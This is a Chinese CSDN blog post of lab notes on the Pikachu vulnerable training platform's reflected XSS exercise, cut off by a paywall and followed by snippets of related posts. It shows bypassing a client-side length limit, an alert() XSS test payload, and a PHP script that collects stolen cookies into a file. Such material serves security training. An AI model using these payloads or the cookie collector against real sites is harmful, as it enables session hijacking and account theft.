pikachu漏洞练习平台使用笔记-XSS(反射型XSS)

最新推荐文章于 2024-06-01 15:03:32 发布
最新推荐文章于 2024-06-01 15:03:32 发布
阅读量1.7k 收藏 2
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/donghongzhe/article/details/106320860
版权

 反射型XSS get方式

在表单里直接输入xss语句,会发现限制字符长度,我们可以审查元素,把长度20改大一点,就恶意输入更多字符了,但是每次刷新后还会重新变为20,所以还是直接在网址框里输入吧

 我们输入一个简单的XSS语句

<script>alert("XSS")</script>

发现可以解析,即存在XSS漏洞

接下来,我们简单利用一下这个反射型XSS漏洞,来获取用户cookie

我们需要一个接收cookie的服务器(127.0.0.1:80),来接收受害主机的cookie

下面是一个接收代码(getcookie.php),把接收的cookie存到cookie.txt文件

<?php
$cookie=$_GET['cookie'];
$fp = fopen("cookie.txt","a");
fwrite($fp," Cookie:".$cookie."/n");
?>

 接下来就

最低0.47元/天 解锁文章
我有一只猫V
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pikachu靶场之XSS(反射性、存储、DOM)
qq_43659378的博客
11-19 1189
pikachu靶场之XSS攻击 一、反射xss(get) 首先输入" ’ <>xss"用于测试我们的输入会不会被过滤掉,因为输入的内容中存在特殊字符。 输入js脚本<script>alert('xss')</script>,看是否被过滤,发现对输入的内容有长度限制,在页面找到开发者工具,修改即可。修改后提交,恶意代码执行,成功弹窗。 二、存储xss 一般都是在留言板内,把内容保存在数据库,这样每次访问这个页面就会触发xss攻击。 可以通过恶意js代码
pikachuxss漏洞学习
weixin_38720471的博客
01-24 1955
1简介 XSS是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户 XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、盗取用户cookie,甚至对主机进行远程控制 攻击流程# 假设存在漏洞的是一个论坛,攻击者将恶意的JS代码通过XSS漏洞插入到论文的某一页面中 当用户访问这个页面时,都会执行这个恶意的JS代码,这个代码就会在用户的浏览器端执行 XSS攻击类# 危害:存储 > 反射 > DOM 反射:交互的数据一般不会被存在数据库里面,一次性,所见即所得,一般出现在查询页面等 存
kali-搭建Pikachu漏洞练习平台
最新发布
lin__ying的博客
06-01 574
环境:kali。
pikachu-反射xss(get)
weixin_30377461的博客
08-18 553
  首先打开漏洞网页,发现输入的长度好像被限制了, 我们便F12查看源代码,发现长度被限制成了20,而且还是前端验证的,我们可以直接修改为100 在我们的输入框中,输入 <script>alert(3)</script>, 便看到可以弹窗了 转载于:https://www.cnblogs.com/kuail...
Pikachu靶场:反射XSS(get)
witwitwiter的博客
04-07 2378
Pikachu靶场:反射XSS(get) 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 ●反射 交互的数据一般不会被存在在数据库里面,一次性,所见即所得,一般出现在查询类页面等。 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。 跨站脚本漏洞测试流程 1.在目标站点上找到输入点,比如查询接口,留言板等; 2.输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的
[ pikachu ] 靶场通关之 XSS (二) --- 反射 XSS 之 get
qq_51577576的博客
01-14 2509
???? 博主介绍 ????‍???? 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 ????点赞➕评论➕收藏 == 养成习惯(一键三连)???? ????欢迎关注????一起学习????一起讨论⭐️一起进步????文末有彩蛋 ????作者水平有限,欢迎各位大佬指点,相互学习进步! 目录 ???? 博主介绍 一、反射xss(get) 二、过关: 1. 页面 2. 首先确认一下这个页
pikachu漏洞练习平台xss(持续更新中)
m0_55854679的博客
05-04 2065
概述 XSS(跨站脚本) Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类: 1.反射XSS; 2.存储XSS; 3.DOMXSS; XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie的获取,甚至可以结合浏览器自身的漏洞对用户主机进行远程控制等。 XSS是一种发生在web前端浏览器端的漏洞,所以其危害的对象也是前端用户。 形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“
pikachu漏洞练习环境
10-25
"pikachu漏洞练习环境" 是一个专门为网络安全爱好者和专业人士设计的平台,旨在提供一个实践和学习漏洞利用技术的环境。这个环境可以帮助用户提升在网络安全领域的技能,了解常见漏洞的原理,以及如何检测和修复它们...
pikachu-xss.txt
06-10
pikachu-xss
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞
pikachu-master.zip
06-25
Pikachu靶场,正如其名,以其全面的漏洞练习和丰富的实践环节,成为提升网络安全技能的理想平台。 靶场的核心在于模拟实际漏洞,帮助我们理解和应对各种网络威胁。在这个靶场中,你可以接触到如SQL注入、XSS跨站...
pikachu靶场包含网络安全中常见的漏洞
11-08
Pikachu靶场中,你可以学习如何检测XSS漏洞,理解反射、存储和DOMXSS的区别,并掌握防御策略,如输入过滤、输出编码等。 2. **SQL注入**:SQL注入是攻击者通过输入恶意的SQL语句来获取、修改、删除数据库...
pikachuxss漏洞复现
m0_54024658的博客
05-24 664
xss跨站脚本xss简介xss漏洞反射存储DOMXSS攻击过程漏洞复现反射XSS(get)存储XSSDOMXSS xss简介 XSS(跨站脚本)是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户,XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、盗取用户cookie,甚至对主机进行远程控制。因为对程序中输入和输出的控制不够严格,导致漏洞的形成。 xss漏洞 反射 交互的数据一般不会被存在数据库里面,一次性,所见即所得,一般出现在查询页面等 存储 交互的数据会被存在数据库里面,
pikachu-xss
2303_81631620的博客
04-23 535
按原本的做法,应该先写一个script标签测试一下,但是发现有字符限制。
皮卡丘(pikachu) XSS三种类举例
weixin_44787832的博客
07-22 3475
反射xss(get) 首先输入 >'''<> 并提交,发现可以正常输出 查看源码 发现我们的输入全部输出到了p标签中 之后我们输入payload: <script>alert("xss")</script> 发现输入框中容不下这么长的数据 之后我们F12,去改maxlength的值 改完后我们的payload执行成功 查看源码,JS代码被浏览器执行 像这种GETXSS漏洞,一般可将含XSS的URL伪.
pikachu-XSS(跨站脚本攻击)
a1245678899的博客
11-09 1127
XSS漏洞的成因是没有对WEB前端的输入边界尽心严格的过滤,造成攻击者可以通过构造脚本语言使得输入的内容 被当成正常的HTML来执行(类似于SQL注入),从而产生危害。造成DOMXSS的原因是前端的输入被DOM给获取到了,通过DOM又在前端输出,跟反射和存储比起来,它是不经过后台交互的。存储XSS反射XSS形成的原因是一样的,不同的是存储XSS下攻击者的可以将脚本注入到后台存储起来,构成更加持久的危害。编码,后台过滤了特殊字符,比如标签,但该标签可以被各种编码,后台不一定过。
一个基础的反射XSS
baidu_41942652的博客
04-28 1026
首先打开pikachu测试平台,找到反射xss(get)。 先输入‘“<>6666测试一下是否有xss漏洞。 查看后台源代码 发现我们输入的语句嵌入到了p标签里 这样,我们就可以用合法的script语句进行修改了。 输入一个简单的弹窗语句,发现有字数限制。 查看后台源码,发现只是简单的前段字数限制。 将maxlength=20改大。 这样,再次输入弹窗语句。 发现弹窗成...
第七周作业 1.domXSS详解及演示 2.cookie获取及xss后台使用 3.反射XSS(POST) 4.xss钓鱼演示 5.xss获取键盘记录演示
weixin_43899561的博客
04-21 1875
1.domXSS详解及演示 一、什么是DOM?怎么理解DOM? DOM全称是Document Object Model,也就是文档对象模。我们可以将DOM理解为,一个与系统平台和编程语言无关的接口,程序和脚本可以通过这个接口动态地访问和修改文档内容、结构和样式。当创建好一个页面并加载到浏览器时,DOM就悄然而生,它会把网页文档转换为一个文档对象,主要功能是处理网页内容。故可以使用 Javasc...
3-2从基础的反射XSS开始
山兔的博客
04-13 1263
我们通过pikachu反射xss给大家做一个演示 根据我们之前讲的思路,我们走一遍,首先,我们要确认下这个页面上是不是存在xss漏洞,我们首先可以在这个对应的输入点,去输入一些特殊的字符,比如说单引号、双引号、左右尖括号、七个七,这样的一个payload '"<>7777 这样输入的目的,就是测试,我们的输入在提交的时候,会不会被过滤掉,因为他有特殊字符,然后去验证这个输入,最终会不会被输出,输出的时候,有没有被处理,是这么个目的,然后我们点一下提交 根据我们刚刚的输入,看一下页面的
pikachu漏洞练习
10-20
Pikachu是一个带有漏洞的Web应用系统,它包含了常见的web安全漏洞,可以作为Web渗透测试学习人员进行练习的靶场。Pikachu的安装非常简单,可以使用官方给出的docker部署方式部署。此外,Pikachu漏洞练习环境可以直接放在apache中的www目录下即可,如果遇到不会安装的问题,可以向相关人员咨询。在Pikachu平台中,我们可以通过添加密码字典的方式进行暴力破解,但是如果密码字典中没有真正的密码,那么就无法破解成功。因此,我们需要手动添加真正的密码,才能进行破解。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值